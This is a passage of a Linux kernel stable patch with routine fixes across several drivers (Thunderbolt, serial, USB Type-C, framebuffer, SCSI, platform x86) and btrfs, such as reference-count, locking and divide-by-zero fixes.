+@@ -485,8 +485,10 @@ int __ssam_register_clients(struct device *parent, struct ssam_controller *ctrl,
+ 		 * device, so ignore it and continue with the next one.
+ 		 */
+ 		status = ssam_add_client_device(parent, ctrl, child);
+-		if (status && status != -ENODEV)
++		if (status && status != -ENODEV) {
++			fwnode_handle_put(child);
+ 			goto err;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index 4e28c55f0ea52..bd38c7dcae347 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1164,7 +1164,6 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,  65, { KEY_PROG4 } },
+ 	{ KE_KEY,  66, { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY,  67, { KEY_TOUCHPAD_ON } },
+-	{ KE_KEY,  68, { KEY_TOUCHPAD_TOGGLE } },
+ 	{ KE_KEY, 128, { KEY_ESC } },
+ 
+ 	/*
+@@ -1520,18 +1519,16 @@ static void ideapad_sync_touchpad_state(struct ideapad_private *priv, bool send_
+ 	if (priv->features.ctrl_ps2_aux_port)
+ 		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
+ 
+-	if (send_events) {
+-		/*
+-		 * On older models the EC controls the touchpad and toggles it
+-		 * on/off itself, in this case we report KEY_TOUCHPAD_ON/_OFF.
+-		 * If the EC did not toggle, report KEY_TOUCHPAD_TOGGLE.
+-		 */
+-		if (value != priv->r_touchpad_val) {
+-			ideapad_input_report(priv, value ? 67 : 66);
+-			sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+-		} else {
+-			ideapad_input_report(priv, 68);
+-		}
++	/*
++	 * On older models the EC controls the touchpad and toggles it on/off
++	 * itself, in this case we report KEY_TOUCHPAD_ON/_OFF. Some models do
++	 * an acpi-notify with VPC bit 5 set on resume, so this function get
++	 * called with send_events=true on every resume. Therefor if the EC did
++	 * not toggle, do nothing to avoid sending spurious KEY_TOUCHPAD_TOGGLE.
++	 */
++	if (send_events && value != priv->r_touchpad_val) {
++		ideapad_input_report(priv, value ? 67 : 66);
++		sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+ 	}
+ 
+ 	priv->r_touchpad_val = value;
+diff --git a/drivers/platform/x86/intel/pmc/core.c b/drivers/platform/x86/intel/pmc/core.c
+index 17ec5825d13d7..be0fb9401202a 100644
+--- a/drivers/platform/x86/intel/pmc/core.c
++++ b/drivers/platform/x86/intel/pmc/core.c
+@@ -958,7 +958,18 @@ static inline void pmc_core_reg_write(struct pmc_dev *pmcdev, int reg_offset,
+ 
+ static inline u64 pmc_core_adjust_slp_s0_step(struct pmc_dev *pmcdev, u32 value)
+ {
+-	return (u64)value * pmcdev->map->slp_s0_res_counter_step;
++	/*
++	 * ADL PCH does not have the SLP_S0 counter and LPM Residency counters are
++	 * used as a workaround which uses 30.5 usec tick. All other client
++	 * programs have the legacy SLP_S0 residency counter that is using the 122
++	 * usec tick.
++	 */
++	const int lpm_adj_x2 = pmcdev->map->lpm_res_counter_step_x2;
++
++	if (pmcdev->map == &adl_reg_map)
++		return (u64)value * GET_X2_COUNTER((u64)lpm_adj_x2);
++	else
++		return (u64)value * pmcdev->map->slp_s0_res_counter_step;
+ }
+ 
+ static int set_etr3(struct pmc_dev *pmcdev)
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index a01a92769c1a3..74af3e593b2ca 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -941,12 +941,23 @@ static ssize_t possible_values_show(struct kobject *kobj, struct kobj_attribute
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+ 
+-	if (!tlmi_priv.can_get_bios_selections)
+-		return -EOPNOTSUPP;
+-
+ 	return sysfs_emit(buf, "%s\n", setting->possible_values);
+ }
+ 
++static ssize_t type_show(struct kobject *kobj, struct kobj_attribute *attr,
++		char *buf)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	if (setting->possible_values) {
++		/* Figure out what setting type is as BIOS does not return this */
++		if (strchr(setting->possible_values, ';'))
++			return sysfs_emit(buf, "enumeration\n");
++	}
++	/* Anything else is going to be a string */
++	return sysfs_emit(buf, "string\n");
++}
++
+ static ssize_t current_value_store(struct kobject *kobj,
+ 		struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+@@ -1036,14 +1047,30 @@ static struct kobj_attribute attr_possible_values = __ATTR_RO(possible_values);
+ 
+ static struct kobj_attribute attr_current_val = __ATTR_RW_MODE(current_value, 0600);
+ 
++static struct kobj_attribute attr_type = __ATTR_RO(type);
++
++static umode_t attr_is_visible(struct kobject *kobj,
++					     struct attribute *attr, int n)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	/* We don't want to display possible_values attributes if not available */
++	if ((attr == &attr_possible_values.attr) && (!setting->possible_values))
++		return 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *tlmi_attrs[] = {
+ 	&attr_displ_name.attr,
+ 	&attr_current_val.attr,
+ 	&attr_possible_values.attr,
++	&attr_type.attr,
+ 	NULL
+ };
+ 
+ static const struct attribute_group tlmi_attr_group = {
++	.is_visible = attr_is_visible,
+ 	.attrs = tlmi_attrs,
+ };
+ 
+@@ -1423,7 +1450,34 @@ static int tlmi_analyze(void)
+ 			if (ret || !setting->possible_values)
+ 				pr_info("Error retrieving possible values for %d : %s\n",
+ 						i, setting->display_name);
++		} else {
++			/*
++			 * Older Thinkstations don't support the bios_selections API.
++			 * Instead they store this as a [Optional:Option1,Option2] section of the
++			 * name string.
++			 * Try and pull that out if it's available.
++			 */
++			char *item, *optstart, *optend;
++
++			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(item, "[Optional:");
++				if (optstart) {
++					optstart += strlen("[Optional:");
++					optend = strstr(optstart, "]");
++					if (optend)
++						setting->possible_values =
++							kstrndup(optstart, optend - optstart,
++									GFP_KERNEL);
++				}
++			}
+ 		}
++		/*
++		 * firmware-attributes requires that possible_values are separated by ';' but
++		 * Lenovo FW uses ','. Replace appropriately.
++		 */
++		if (setting->possible_values)
++			strreplace(setting->possible_values, ',', ';');
++
+ 		kobject_init(&setting->kobj, &tlmi_attr_setting_ktype);
+ 		tlmi_priv.setting[i] = setting;
+ 		kfree(item);
+diff --git a/drivers/ptp/ptp_qoriq.c b/drivers/ptp/ptp_qoriq.c
+index 08f4cf0ad9e3c..8fa9772acf79b 100644
+--- a/drivers/ptp/ptp_qoriq.c
++++ b/drivers/ptp/ptp_qoriq.c
+@@ -601,7 +601,7 @@ static int ptp_qoriq_probe(struct platform_device *dev)
+ 	return 0;
+ 
+ no_clock:
+-	iounmap(ptp_qoriq->base);
++	iounmap(base);
+ no_ioremap:
+ 	release_resource(ptp_qoriq->rsrc);
+ no_resource:
+diff --git a/drivers/regulator/fixed.c b/drivers/regulator/fixed.c
+index 2a9867abba20c..e6724a229d237 100644
+--- a/drivers/regulator/fixed.c
++++ b/drivers/regulator/fixed.c
+@@ -215,7 +215,7 @@ static int reg_fixed_voltage_probe(struct platform_device *pdev)
+ 		drvdata->enable_clock = devm_clk_get(dev, NULL);
+ 		if (IS_ERR(drvdata->enable_clock)) {
+ 			dev_err(dev, "Can't get enable-clock from devicetree\n");
+-			return -ENOENT;
++			return PTR_ERR(drvdata->enable_clock);
+ 		}
+ 	} else if (drvtype && drvtype->has_performance_state) {
+ 		drvdata->desc.ops = &fixed_voltage_domain_ops;
+diff --git a/drivers/s390/crypto/vfio_ap_drv.c b/drivers/s390/crypto/vfio_ap_drv.c
+index f43cfeabd2cc8..0afceb63ac43c 100644
+--- a/drivers/s390/crypto/vfio_ap_drv.c
++++ b/drivers/s390/crypto/vfio_ap_drv.c
+@@ -54,8 +54,9 @@ static struct ap_driver vfio_ap_drv = {
+ 
+ static void vfio_ap_matrix_dev_release(struct device *dev)
+ {
+-	struct ap_matrix_dev *matrix_dev = dev_get_drvdata(dev);
++	struct ap_matrix_dev *matrix_dev;
+ 
++	matrix_dev = container_of(dev, struct ap_matrix_dev, device);
+ 	kfree(matrix_dev);
+ }
+ 
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.c b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+index 6650f8c8e9b04..af22ffa8f6a25 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fusion.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+@@ -4768,7 +4768,7 @@ int megasas_task_abort_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"task abort issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+@@ -4838,7 +4838,7 @@ int megasas_reset_target_fusion(struct scsi_cmnd *scmd)
+ 	devhandle = megasas_get_tm_devhandle(scmd->device);
+ 
+ 	if (devhandle == (u16)ULONG_MAX) {
+-		ret = SUCCESS;
++		ret = FAILED;
+ 		sdev_printk(KERN_INFO, scmd->device,
+ 			"target reset issued for invalid devhandle\n");
+ 		mutex_unlock(&instance->reset_mutex);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 2ee9ea57554d7..14ae0a9c5d3d8 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -6616,11 +6616,6 @@ _base_allocate_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 	else if (rc == -EAGAIN)
+ 		goto try_32bit_dma;
+ 	total_sz += sense_sz;
+-	ioc_info(ioc,
+-	    "sense pool(0x%p)- dma(0x%llx): depth(%d),"
+-	    "element_size(%d), pool_size(%d kB)\n",
+-	    ioc->sense, (unsigned long long)ioc->sense_dma, ioc->scsiio_depth,
+-	    SCSI_SENSE_BUFFERSIZE, sz / 1024);
+ 	/* reply pool, 4 byte align */
+ 	sz = ioc->reply_free_queue_depth * ioc->reply_sz;
+ 	rc = _base_allocate_reply_pool(ioc, sz);
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index ae28a03fa890b..1157b8869bcca 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -26,6 +26,19 @@ static void quirk_clx_disable(struct tb_switch *sw)
+ 	tb_sw_dbg(sw, "disabling CL states\n");
+ }
+ 
++static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
++{
++	struct tb_port *port;
++
++	tb_switch_for_each_port(sw, port) {
++		if (!tb_port_is_usb3_down(port))
++			continue;
++		port->max_bw = 16376;
++		tb_port_dbg(port, "USB3 maximum bandwidth limited to %u Mb/s\n",
++			    port->max_bw);
++	}
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -43,6 +56,24 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * Limit the maximum USB3 bandwidth for the following Intel USB4
++	 * host routers due to a hardware issue.
++	 */
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_ADL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_RPL_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_M_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI0, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI1, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index e11d973a8f9b6..f034723b1b40e 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -252,6 +252,8 @@ struct tb_switch {
+  * @ctl_credits: Buffers reserved for control path
+  * @dma_credits: Number of credits allocated for DMA tunneling for all
+  *		 DMA paths through this port.
++ * @max_bw: Maximum possible bandwidth through this adapter if set to
++ *	    non-zero.
+  *
+  * In USB4 terminology this structure represents an adapter (protocol or
+  * lane adapter).
+@@ -277,6 +279,7 @@ struct tb_port {
+ 	unsigned int total_credits;
+ 	unsigned int ctl_credits;
+ 	unsigned int dma_credits;
++	unsigned int max_bw;
+ };
+ 
+ /**
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index cf8d4f769579e..3c821f5e44814 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1865,6 +1865,15 @@ int usb4_port_retimer_nvm_read(struct tb_port *port, u8 index,
+ 				usb4_port_retimer_nvm_read_block, &info);
+ }
+ 
++static inline unsigned int
++usb4_usb3_port_max_bandwidth(const struct tb_port *port, unsigned int bw)
++{
++	/* Take the possible bandwidth limitation into account */
++	if (port->max_bw)
++		return min(bw, port->max_bw);
++	return bw;
++}
++
+ /**
+  * usb4_usb3_port_max_link_rate() - Maximum support USB3 link rate
+  * @port: USB3 adapter port
+@@ -1886,7 +1895,9 @@ int usb4_usb3_port_max_link_rate(struct tb_port *port)
+ 		return ret;
+ 
+ 	lr = (val & ADP_USB3_CS_4_MSLR_MASK) >> ADP_USB3_CS_4_MSLR_SHIFT;
+-	return lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_MSLR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ /**
+@@ -1913,7 +1924,9 @@ int usb4_usb3_port_actual_link_rate(struct tb_port *port)
+ 		return 0;
+ 
+ 	lr = val & ADP_USB3_CS_4_ALR_MASK;
+-	return lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++	ret = lr == ADP_USB3_CS_4_ALR_20G ? 20000 : 10000;
++
++	return usb4_usb3_port_max_bandwidth(port, ret);
+ }
+ 
+ static int usb4_usb3_port_cm_request(struct tb_port *port, bool request)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index c51883f34ac2b..cd98c04de0330 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -582,7 +582,7 @@ static void lpuart_flush_buffer(struct uart_port *port)
+ 				sport->dma_tx_nents, DMA_TO_DEVICE);
+ 			sport->dma_tx_in_progress = false;
+ 		}
+-		dmaengine_terminate_all(chan);
++		dmaengine_terminate_async(chan);
+ 	}
+ 
+ 	if (lpuart_is_32(sport)) {
+@@ -1333,7 +1333,8 @@ static void lpuart_dma_rx_free(struct uart_port *port)
+ 					struct lpuart_port, port);
+ 	struct dma_chan *chan = sport->dma_rx_chan;
+ 
+-	dmaengine_terminate_all(chan);
++	dmaengine_terminate_sync(chan);
++	del_timer_sync(&sport->lpuart_timer);
+ 	dma_unmap_sg(chan->device->dev, &sport->rx_sgl, 1, DMA_FROM_DEVICE);
+ 	kfree(sport->rx_ring.buf);
+ 	sport->rx_ring.tail = 0;
+@@ -1757,7 +1758,6 @@ static int lpuart32_startup(struct uart_port *port)
+ static void lpuart_dma_shutdown(struct lpuart_port *sport)
+ {
+ 	if (sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
+ 		lpuart_dma_rx_free(&sport->port);
+ 		sport->lpuart_dma_rx_use = false;
+ 	}
+@@ -1766,7 +1766,7 @@ static void lpuart_dma_shutdown(struct lpuart_port *sport)
+ 		if (wait_event_interruptible_timeout(sport->dma_wait,
+ 			!sport->dma_tx_in_progress, msecs_to_jiffies(300)) <= 0) {
+ 			sport->dma_tx_in_progress = false;
+-			dmaengine_terminate_all(sport->dma_tx_chan);
++			dmaengine_terminate_sync(sport->dma_tx_chan);
+ 		}
+ 		sport->lpuart_dma_tx_use = false;
+ 	}
+@@ -1917,10 +1917,8 @@ lpuart_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since timer function acqures sport->port.lock, need to stop before
+ 	 * acquring same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2154,10 +2152,8 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since timer function acqures sport->port.lock, need to stop before
+ 	 * acquring same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
+-	if (old && sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
++	if (old && sport->lpuart_dma_rx_use)
+ 		lpuart_dma_rx_free(&sport->port);
+-	}
+ 
+ 	spin_lock_irqsave(&sport->port.lock, flags);
+ 
+@@ -2850,7 +2846,6 @@ static int __maybe_unused lpuart_suspend(struct device *dev)
+ 		 * Rx DMA path before suspend and start Rx DMA path on resume.
+ 		 */
+ 		if (irq_wake) {
+-			del_timer_sync(&sport->lpuart_timer);
+ 			lpuart_dma_rx_free(&sport->port);
+ 		}
+ 
+@@ -2867,7 +2862,7 @@ static int __maybe_unused lpuart_suspend(struct device *dev)
+ 
+ 	if (sport->lpuart_dma_tx_use) {
+ 		sport->dma_tx_in_progress = false;
+-		dmaengine_terminate_all(sport->dma_tx_chan);
++		dmaengine_terminate_sync(sport->dma_tx_chan);
+ 	}
+ 
+ 	if (sport->port.suspended && !irq_wake)
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 8cbbb002fefe0..086b509689839 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1039,9 +1039,8 @@ static struct fwnode_handle *ucsi_find_fwnode(struct ucsi_connector *con)
+ 	return NULL;
+ }
+ 
+-static int ucsi_register_port(struct ucsi *ucsi, int index)
++static int ucsi_register_port(struct ucsi *ucsi, struct ucsi_connector *con)
+ {
+-	struct ucsi_connector *con = &ucsi->connector[index];
+ 	struct typec_capability *cap = &con->typec_cap;
+ 	enum typec_accessory *accessory = cap->accessory;
+ 	enum usb_role u_role = USB_ROLE_NONE;
+@@ -1062,7 +1061,6 @@ static int ucsi_register_port(struct ucsi *ucsi, int index)
+ 	init_completion(&con->complete);
+ 	mutex_init(&con->lock);
+ 	INIT_LIST_HEAD(&con->partner_tasks);
+-	con->num = index + 1;
+ 	con->ucsi = ucsi;
+ 
+ 	cap->fwnode = ucsi_find_fwnode(con);
+@@ -1204,7 +1202,7 @@ out_unlock:
+  */
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+-	struct ucsi_connector *con;
++	struct ucsi_connector *con, *connector;
+ 	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+@@ -1235,16 +1233,16 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Allocate the connectors. Released in ucsi_unregister() */
+-	ucsi->connector = kcalloc(ucsi->cap.num_connectors + 1,
+-				  sizeof(*ucsi->connector), GFP_KERNEL);
+-	if (!ucsi->connector) {
++	connector = kcalloc(ucsi->cap.num_connectors + 1, sizeof(*connector), GFP_KERNEL);
++	if (!connector) {
+ 		ret = -ENOMEM;
+ 		goto err_reset;
+ 	}
+ 
+ 	/* Register all connectors */
+ 	for (i = 0; i < ucsi->cap.num_connectors; i++) {
+-		ret = ucsi_register_port(ucsi, i);
++		connector[i].num = i + 1;
++		ret = ucsi_register_port(ucsi, &connector[i]);
+ 		if (ret)
+ 			goto err_unregister;
+ 	}
+@@ -1256,11 +1254,12 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->connector = connector;
+ 	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+-	for (con = ucsi->connector; con->port; con++) {
++	for (con = connector; con->port; con++) {
+ 		ucsi_unregister_partner(con);
+ 		ucsi_unregister_altmodes(con, UCSI_RECIPIENT_CON);
+ 		ucsi_unregister_port_psy(con);
+@@ -1269,10 +1268,7 @@ err_unregister:
+ 		typec_unregister_port(con->port);
+ 		con->port = NULL;
+ 	}
+-
+-	kfree(ucsi->connector);
+-	ucsi->connector = NULL;
+-
++	kfree(connector);
+ err_reset:
+ 	memset(&ucsi->cap, 0, sizeof(ucsi->cap));
+ 	ucsi_reset_ppm(ucsi);
+diff --git a/drivers/video/fbdev/au1200fb.c b/drivers/video/fbdev/au1200fb.c
+index 81c3154544287..b6b22fa4a8a01 100644
+--- a/drivers/video/fbdev/au1200fb.c
++++ b/drivers/video/fbdev/au1200fb.c
+@@ -1040,6 +1040,9 @@ static int au1200fb_fb_check_var(struct fb_var_screeninfo *var,
+ 	u32 pixclock;
+ 	int screen_size, plane;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	plane = fbdev->plane;
+ 
+ 	/* Make sure that the mode respect all LCD controller and
+diff --git a/drivers/video/fbdev/geode/lxfb_core.c b/drivers/video/fbdev/geode/lxfb_core.c
+index 9d26592dbfce9..41fda498406c1 100644
+--- a/drivers/video/fbdev/geode/lxfb_core.c
++++ b/drivers/video/fbdev/geode/lxfb_core.c
+@@ -235,6 +235,9 @@ static void get_modedb(struct fb_videomode **modedb, unsigned int *size)
+ 
+ static int lxfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (var->xres > 1920 || var->yres > 1440)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/video/fbdev/intelfb/intelfbdrv.c b/drivers/video/fbdev/intelfb/intelfbdrv.c
+index d4a2891a9a7ac..a93dd531d00df 100644
+--- a/drivers/video/fbdev/intelfb/intelfbdrv.c
++++ b/drivers/video/fbdev/intelfb/intelfbdrv.c
+@@ -1219,6 +1219,9 @@ static int intelfb_check_var(struct fb_var_screeninfo *var,
+ 
+ 	dinfo = GET_DINFO(info);
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	/* update the pitch */
+ 	if (intelfbhw_validate_mode(dinfo, var) != 0)
+ 		return -EINVAL;
+diff --git a/drivers/video/fbdev/nvidia/nvidia.c b/drivers/video/fbdev/nvidia/nvidia.c
+index a6c3bc2222463..1b8904824ad83 100644
+--- a/drivers/video/fbdev/nvidia/nvidia.c
++++ b/drivers/video/fbdev/nvidia/nvidia.c
+@@ -764,6 +764,8 @@ static int nvidiafb_check_var(struct fb_var_screeninfo *var,
+ 	int pitch, err = 0;
+ 
+ 	NVTRACE_ENTER();
++	if (!var->pixclock)
++		return -EINVAL;
+ 
+ 	var->transp.offset = 0;
+ 	var->transp.length = 0;
+diff --git a/drivers/video/fbdev/tgafb.c b/drivers/video/fbdev/tgafb.c
+index 251dbd282f5ed..84d5daef97666 100644
+--- a/drivers/video/fbdev/tgafb.c
++++ b/drivers/video/fbdev/tgafb.c
+@@ -173,6 +173,9 @@ tgafb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ {
+ 	struct tga_par *par = (struct tga_par *)info->par;
+ 
++	if (!var->pixclock)
++		return -EINVAL;
++
+ 	if (par->tga_type == TGA_TYPE_8PLANE) {
+ 		if (var->bits_per_pixel != 8)
+ 			return -EINVAL;
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 4b69945755e4f..f33ddd5922b8c 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -3259,13 +3259,15 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 	spin_unlock(&info->delalloc_root_lock);
+ 
+ 	while (total) {
+-		bool reclaim;
++		struct btrfs_space_info *space_info;
++		bool reclaim = false;
+ 
+ 		cache = btrfs_lookup_block_group(info, bytenr);
+ 		if (!cache) {
+ 			ret = -ENOENT;
+ 			break;
+ 		}
++		space_info = cache->space_info;
+ 		factor = btrfs_bg_type_to_factor(cache->flags);
+ 
+ 		/*
+@@ -3280,7 +3282,7 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 		byte_in_group = bytenr - cache->start;
+ 		WARN_ON(byte_in_group > cache->length);
+ 
+-		spin_lock(&cache->space_info->lock);
++		spin_lock(&space_info->lock);
+ 		spin_lock(&cache->lock);
+ 
+ 		if (btrfs_test_opt(info, SPACE_CACHE) &&
+@@ -3293,23 +3295,23 @@ int btrfs_update_block_group(struct btrfs_trans_handle *trans,
+ 			old_val += num_bytes;
+ 			cache->used = old_val;
+ 			cache->reserved -= num_bytes;
+-			cache->space_info->bytes_reserved -= num_bytes;
+-			cache->space_info->bytes_used += num_bytes;
+-			cache->space_info->disk_used += num_bytes * factor;
++			space_info->bytes_reserved -= num_bytes;
++			space_info->bytes_used += num_bytes;
++			space_info->disk_used += num_bytes * factor;
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 		} else {
+ 			old_val -= num_bytes;
+ 			cache->used = old_val;
+ 			cache->pinned += num_bytes;
+-			btrfs_space_info_update_bytes_pinned(info,
+-					cache->space_info, num_bytes);
+-			cache->space_info->bytes_used -= num_bytes;
+-			cache->space_info->disk_used -= num_bytes * factor;
++			btrfs_space_info_update_bytes_pinned(info, space_info,
++							     num_bytes);
++			space_info->bytes_used -= num_bytes;
++			space_info->disk_used -= num_bytes * factor;
+ 
+ 			reclaim = should_reclaim_block_group(cache, num_bytes);
+ 			spin_unlock(&cache->lock);
+-			spin_unlock(&cache->space_info->lock);
++			spin_unlock(&space_info->lock);
+ 
+ 			set_extent_dirty(&trans->transaction->pinned_extents,
+ 					 bytenr, bytenr + num_bytes - 1,
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index a3febabacec04..3bcef0c4d6fc4 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -590,11 +590,8 @@ enum {
+ 	/* Indicate we have to finish a zone to do next allocation. */
+ 	BTRFS_FS_NEED_ZONE_FINISH,
+ 
+-	/*
+-	 * Indicate metadata over-commit is disabled. This is set when active
+-	 * zone tracking is needed.
+-	 */
+-	BTRFS_FS_NO_OVERCOMMIT,
++	/* This is set when active zone tracking is needed. */
++	BTRFS_FS_ACTIVE_ZONE_TRACKING,
+ 
+ #if BITS_PER_LONG == 32
+ 	/* Indicate if we have error/warn message printed on 32bit systems */
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index f4023651dd68b..6a8f2bd350f4b 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2684,8 +2684,13 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+ 	spin_lock(&ctl->tree_lock);
++	/* Count initial region as zone_unusable until it gets activated. */
+ 	if (!used)
+ 		to_free = size;
++	else if (initial &&
++		 test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &block_group->fs_info->flags) &&
++		 (block_group->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM)))
++		to_free = 0;
+ 	else if (initial)
+ 		to_free = block_group->zone_capacity;
+ 	else if (offset >= block_group->alloc_offset)
+@@ -2713,7 +2718,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	reclaimable_unusable = block_group->zone_unusable -
+ 			       (block_group->length - block_group->zone_capacity);
+ 	/* All the region is now unusable. Mark it as unused and reclaim */
+-	if (block_group->zone_unusable == block_group->length) {
++	if (block_group->zone_unusable == block_group->length &&
++	    block_group->alloc_offset) {
+ 		btrfs_mark_bg_unused(block_group);
+ 	} else if (bg_reclaim_threshold &&
+ 		   reclaimable_unusable >=
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index c05f16a35bcaf..fe2fb81da46ba 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -4621,7 +4621,9 @@ static long btrfs_ioctl_qgroup_assign(struct file *file, void __user *arg)
+ 	}
+ 
+ 	/* update qgroup status and info */
++	mutex_lock(&fs_info->qgroup_ioctl_lock);
+ 	err = btrfs_run_qgroups(trans);
++	mutex_unlock(&fs_info->qgroup_ioctl_lock);
+ 	if (err < 0)
+ 		btrfs_handle_fs_error(fs_info, err,
+ 				      "failed to update qgroup status and info");
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
